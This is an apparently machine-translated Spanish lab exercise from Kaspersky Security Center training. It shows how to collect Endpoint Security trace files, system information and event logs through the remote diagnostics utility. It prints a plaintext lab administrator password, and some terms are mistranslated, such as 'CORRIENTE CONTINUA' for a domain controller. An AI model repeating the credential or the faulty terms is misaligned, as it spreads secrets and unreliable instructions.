Encuentra el Alex-Desktop computadora en la consola e inicie la utilidad de diagnóstico remoto desde su menú contextual. En la ventana de la utilidad, habilite el rastreo
para Kaspersky Endpoint Security, reinicie Kaspersky Endpoint Security y descargue los registros. Además, descargue información sobre la computadora y los registros
de Windows: Kaspersky Event Log and System.

La tarea se realiza en Centro de Seguridad.


los CORRIENTE CONTINUA, Alex-Desktop, y Tom-Laptop Las máquinas deben estar encendidas.

1. Inicie sesión en
abc \ Administrador
cuenta, contraseña
Ka5per5Ky

2) Comience la administración
Consola

3. Ir a la Gestionado
dispositivos nodo

4. Para encontrar el Alex-

Escritorio computadora, ejecute la


utilidad de búsqueda desde el menú
contextual del
Dispositivos gestionados nodo

5. Escriba Alex-Desktop y
hacer clic Encuentra ahora
L – 141
Laboratorio 22.

Cómo recopilar información de diagnóstico

6. Asegúrese de que el
Alex-Desktop la computadora ha

aparecido en los resultados de

búsqueda

7. Ejecute el control remoto

utilidad de diagnóstico: en el menú

contextual de la computadora,

seleccione Herramientas

personalizadas | Diagnóstico remoto

8. Asegúrese de que el
Dispositivo cuadro contiene el
nombre de la AlexDesktop computadora

9. Conecte la utilidad a
la computadora: haga clic en

Registrarse

10) Habilitar rastreo: seleccione Kaspersky


Endpoint Security para Windows

11. Haz clic en el enlace Modificar nivel de rastreo

12. Dejar el nivel de rastreo 500 y

13. Seleccione la casilla de verificación Basado en la rotación

rastreo

14. Establecer el Recuento de archivos a 2

15. Especifique el Tamaño máximo de archivo: 20 MEGABYTE

16. Haga clic en Okay


L – 142 KASPERSKY LAB ™

KL 002.11.1: Kaspersky Security Center 11 y Kaspersky Endpoint Security 11.1

17) Reinicie Kaspersky Endpoint Security: haga clic en


el enlace Reiniciar aplicación

18) Espere a que Kaspersky Endpoint Security


reiniciar: en la parte inferior de la ventana, el mensaje La
operación se realizó con éxito
aparecerá

19) Deshabilitar el seguimiento: haga clic en el enlace Inhabilitar

rastreo

20. Expande el Kaspersky Endpoint Security


para Windows | Archivos de rastreo carpeta

21) Seleccione el primer archivo de la lista y haga clic en el

enlace Descargar archivo

22) Descargue los otros archivos desde Rastro


archivos carpeta de manera similar

23) Descargar información sobre la computadora:


Selecciona el Información del sistema nodo

24. Haz clic en el enlace Descargar información del sistema

25. Expande el Registro de eventos nodo y guardar el

Registro de eventos de Kaspersky y Sistema iniciar sesión de manera

similar

26. Haga clic en el enlace Carpeta de descargas en el

esquina inferior izquierda de la ventana


L – 143
Laboratorio 22.

Cómo recopilar información de diagnóstico

27) Asegúrese de que la carpeta contenga todos los


registros necesarios

28) Cierra la utilidad de diagnóstico

29) No elimine la carpeta con registros: haga clic en


No

Conclusión

Hemos descargado de la computadora los registros de seguimiento de Kaspersky Endpoint Security y la información del sistema. Adjunte estos registros a la solicitud de asistencia
técnica.

También puede usar la utilidad de diagnóstico si necesita registros del Agente de Red, o registros del módulo de actualización, o registros de instalación, o rastreo para el Servidor de
Administración.

También podría gustarte